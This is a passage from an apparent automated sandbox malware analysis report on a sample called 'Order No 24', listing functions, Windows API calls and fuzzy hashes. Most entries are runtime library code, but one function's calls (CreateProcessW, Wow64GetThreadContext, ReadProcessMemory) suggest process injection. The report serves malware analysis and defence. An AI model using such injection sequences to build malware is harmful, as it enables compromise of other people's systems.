                                                                                                                                    • Part of subcall function 00983D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00A41148,00A41130,?,?,?,?,00983AA3,?), ref: 00983DC8
                                                                                                                                    • Part of subcall function 00983D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00983AA3,?), ref: 00983E48
                                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00983AB3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 924797094-0
                                                                                                                                  • Opcode ID: 2ceb93e448c119bc247b14a8e33c413037cb2120cc439ddb4bde83c5cd38fe2d
                                                                                                                                  • Instruction ID: fe22c88dc19f85efc026247672d9f2124057e674ff52a7538e9eb71d5a0fb390
                                                                                                                                  • Opcode Fuzzy Hash: 2ceb93e448c119bc247b14a8e33c413037cb2120cc439ddb4bde83c5cd38fe2d
                                                                                                                                  • Instruction Fuzzy Hash: 6F119D799043459BC700EFA9E845A1AFBE8EFD5710F008A1EF584872B1DB719586CB92
                                                                                                                                  Function 009AE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___lock_fhandle.LIBCMT ref: 009AEA29
                                                                                                                                  • __close_nolock.LIBCMT ref: 009AEA42
                                                                                                                                    • Part of subcall function 009A7BDA: __getptd_noexit.LIBCMT ref: 009A7BDA
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1046115767-0
                                                                                                                                  • Opcode ID: a6d6c7cd62c54fdf85e7c44365530e3b3bd5678a81d51e397ab0a145aa122323
                                                                                                                                  • Instruction ID: ab1adb769c226374799a33618d11cfbf708dbf84a6c39411d4f6aa78d9a90c86
                                                                                                                                  • Opcode Fuzzy Hash: a6d6c7cd62c54fdf85e7c44365530e3b3bd5678a81d51e397ab0a145aa122323
                                                                                                                                  • Instruction Fuzzy Hash: 25116172909A109BD712FFA8D8427597A616FC3331F2A4740E4745F2E3CBB88D419BE5
                                                                                                                                  Function 0099F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009A395C: __FF_MSGBANNER.LIBCMT ref: 009A3973
                                                                                                                                    • Part of subcall function 009A395C: __NMSG_WRITE.LIBCMT ref: 009A397A
                                                                                                                                    • Part of subcall function 009A395C: RtlAllocateHeap.NTDLL(01000000,00000000,00000001,00000001,00000000,?,?,0099F507,?,0000000E), ref: 009A399F
                                                                                                                                  • std::exception::exception.LIBCMT ref: 0099F51E
                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0099F533
                                                                                                                                    • Part of subcall function 009A6805: RaiseException.KERNEL32(?,?,0000000E,00A36A30,?,?,?,0099F538,0000000E,00A36A30,?,00000001), ref: 009A6856
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3902256705-0
                                                                                                                                  • Opcode ID: 0af3465038f27d9b9597f5a9183839db9380c6ccb17744082f633c6e1b57ad43
                                                                                                                                  • Instruction ID: ddc979936068279e354130890936f5e837d11c368109dc43e43a6fa141375ede
                                                                                                                                  • Opcode Fuzzy Hash: 0af3465038f27d9b9597f5a9183839db9380c6ccb17744082f633c6e1b57ad43
                                                                                                                                  • Instruction Fuzzy Hash: 66F0C23210421EA7DB04BF9CEC11AEEB7ECAF42394F648429F908D6191DBB0D74097E6
                                                                                                                                  Function 009A35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  • __lock_file.LIBCMT ref: 009A3629
                                                                                                                                    • Part of subcall function 009A4E1C: __lock.LIBCMT ref: 009A4E3F
                                                                                                                                  • __fclose_nolock.LIBCMT ref: 009A3634
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2800547568-0
                                                                                                                                  • Opcode ID: 067936094661bf7719c87fb06912719c24e66ab1afc2c327e2ae1a98399cc834
                                                                                                                                  • Instruction ID: 1096c25ae8a3a3df5eb9bf6e881b740fdced9eb4f38bc9ddb80cea89b15e2073
                                                                                                                                  • Opcode Fuzzy Hash: 067936094661bf7719c87fb06912719c24e66ab1afc2c327e2ae1a98399cc834
                                                                                                                                  • Instruction Fuzzy Hash: 47F0B431941304BAD711BFA5880776EBAA46F93330F29C508F424AB2C1CB7C8A419FD5
                                                                                                                                  Function 01272BAD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 0127336B
                                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01273401
                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01273423
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141637301.0000000001271000.00000040.00000020.00020000.00000000.sdmp, Offset: 01271000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1271000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2438371351-0
                                                                                                                                  • Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                                                                                                  • Instruction ID: 6286de31d24608bdf8008cfe9d0dbde82f60d3d04c464df4ebb66a6dc3630fb7
                                                                                                                                  • Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                                                                                                  • Instruction Fuzzy Hash: 9B12CC24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4E85CB5A
                                                                                                                                  Function 009A2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __flush.LIBCMT ref: 009A2A0B
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __flush__getptd_noexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4101623367-0
                                                                                                                                  • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                                  • Instruction ID: 5b7fcf8c8cdb0e010a63e7952921957f866d808f893e3c67d09d17f0ae0143d5
                                                                                                                                  • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                                  • Instruction Fuzzy Hash: 374171717007069FDF289FADC9815AF7BAAAF86760F24852DE855C7280EB74DD418BC0
                                                                                                                                  Function 0099ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                  • Instruction ID: b36805fd3aee2fe21ff73e94e5f4ce187949a24df468892b163488423e2a52ef
                                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                  • Instruction Fuzzy Hash: 5131C574A00105DBDB18DF5CC480A69FBBAFF49340F648AA5E409CB296DB35EDC1CB90
                                                                                                                                  Function 009F9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  • Opcode ID: 751eb69868c7810d1146c3d7af6e9a233e2b39424bca3a9f68a7fbf2f269f846
                                                                                                                                  • Instruction ID: 125c1e65b35f5788d37f7c913a68c089ea16670995a4ea4abd35c0e0b3d3ff30
                                                                                                                                  • Opcode Fuzzy Hash: 751eb69868c7810d1146c3d7af6e9a233e2b39424bca3a9f68a7fbf2f269f846
                                                                                                                                  • Instruction Fuzzy Hash: 4A412F745087558FDB24DF18C494B2ABBE0BF85308F19895CE99A4B362C376F885CF52
                                                                                                                                  Function 009841A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00984214: FreeLibrary.KERNEL32(00000000,?), ref: 00984247
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009839FE,?,00000001), ref: 009841DB
                                                                                                                                    • Part of subcall function 00984291: FreeLibrary.KERNEL32(00000000), ref: 009842C4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$Free$Load
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2391024519-0
                                                                                                                                  • Opcode ID: bf9551f153ae0633d7ff0110748039e5476401376a59987d882185054429ffb9
                                                                                                                                  • Instruction ID: 3d8a005dfbb1beb56e51d64ca91ec7b9feb78af5a32148126faed5ad0ef974f2
                                                                                                                                  • Opcode Fuzzy Hash: bf9551f153ae0633d7ff0110748039e5476401376a59987d882185054429ffb9
                                                                                                                                  • Instruction Fuzzy Hash: BC11A731604207BBDF10FB74DD06FAE77E99F80700F108829F5A6A62C1DA75DA059B61
                                                                                                                                  Function 009F9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  • Opcode ID: 098a955ff4e62adec51f3334ea3a188c6b91556dc71d1971758a841a2a191489
                                                                                                                                  • Instruction ID: 449b496c2ce9f221b80d7eb6ef931ec0f521251f6b6c14600cfcaf51a3554813
                                                                                                                                  • Opcode Fuzzy Hash: 098a955ff4e62adec51f3334ea3a188c6b91556dc71d1971758a841a2a191489
                                                                                                                                  • Instruction Fuzzy Hash: 65210770508705CFDB24DF68C454B2ABBE1BF85304F25496CF6AA47261D732E845DF92
                                                                                                                                  Function 009AAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___lock_fhandle.LIBCMT ref: 009AAFC0
                                                                                                                                    • Part of subcall function 009A7BDA: __getptd_noexit.LIBCMT ref: 009A7BDA
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __getptd_noexit$___lock_fhandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1144279405-0
                                                                                                                                  • Opcode ID: 138849420ab40c7002096774c1cca8aed8f63b4012055bd65d43d1c721ca0470
                                                                                                                                  • Instruction ID: 1416ba2676e039ddb6d14690d611fb67a72c1769155897d5850a01f1d286e1e6
                                                                                                                                  • Opcode Fuzzy Hash: 138849420ab40c7002096774c1cca8aed8f63b4012055bd65d43d1c721ca0470
                                                                                                                                  • Instruction Fuzzy Hash: D1118F728096609FD712AFE49C4276E7A60AFC3335F2A4640E5741B2E7C7B98D019BE1
                                                                                                                                  Function 009839DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                  • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                                                                  • Instruction ID: 97bb1f5fa7b8990f1fc47fd4411b2118181c940e9a992ef36d002df3215504d9
                                                                                                                                  • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                                                                  • Instruction Fuzzy Hash: 6201813150410EEECF04FFA4C892DFEBF78EF61304F008029B566972A5EA309A49CB60
                                                                                                                                  Function 009A2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __lock_file.LIBCMT ref: 009A2AED
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __getptd_noexit__lock_file
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2597487223-0
                                                                                                                                  • Opcode ID: 5342c579f559c8b902ea2505968c60267e2ba4d91a4ef14a7fa65d228be69eff
                                                                                                                                  • Instruction ID: 683f05cd5c4958b11b1b54a2cfa1cbc40e7c01945942c8822ca17bfd8d4ee26a
                                                                                                                                  • Opcode Fuzzy Hash: 5342c579f559c8b902ea2505968c60267e2ba4d91a4ef14a7fa65d228be69eff
                                                                                                                                  • Instruction Fuzzy Hash: 6DF0F631500215EBDF21AFBC8C023DF36A5BF82324F198415F8149B1D1C7788A52DBD1
                                                                                                                                  Function 00984252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,009839FE,?,00000001), ref: 00984286
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                  • Opcode ID: 4e5c692c4b78f89f7215f56fd0e2fe4045c172f3efd88fb7d3ea47ef84254f35
                                                                                                                                  • Instruction ID: c35d5cffda6a7858dbc43c1ce9e36baebbe12557c2ac5fd21ab19a3080725534
                                                                                                                                  • Opcode Fuzzy Hash: 4e5c692c4b78f89f7215f56fd0e2fe4045c172f3efd88fb7d3ea47ef84254f35
                                                                                                                                  • Instruction Fuzzy Hash: 6BF03971509702CFCB34AFA4D890816BBE8BF043293248A3EF1E786610C7329850DF50
                                                                                                                                  Function 009840A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009840C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongNamePath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 82841172-0
                                                                                                                                  • Opcode ID: 237e109acf301925538f4d8c62d9de9f7f92f9d3577182ff8f3144af7b9aca69
                                                                                                                                  • Instruction ID: 064ef3e132ab4451a37510ae78d372431e9ed6fb93722687a8e6742aebdf8ff7
                                                                                                                                  • Opcode Fuzzy Hash: 237e109acf301925538f4d8c62d9de9f7f92f9d3577182ff8f3144af7b9aca69
                                                                                                                                  • Instruction Fuzzy Hash: F0E0C2376002285BC711E698CC46FEA77ADDFC87A0F0A01B5F909E7244DE64E9828690
                                                                                                                                  Function 01273BAC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 01273BC1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141637301.0000000001271000.00000040.00000020.00020000.00000000.sdmp, Offset: 01271000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1271000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                  • Instruction ID: 74a2f411085f4513785176c5d0febbacfd77b2e8137392b7ef9f44e3b07ab0e0
                                                                                                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
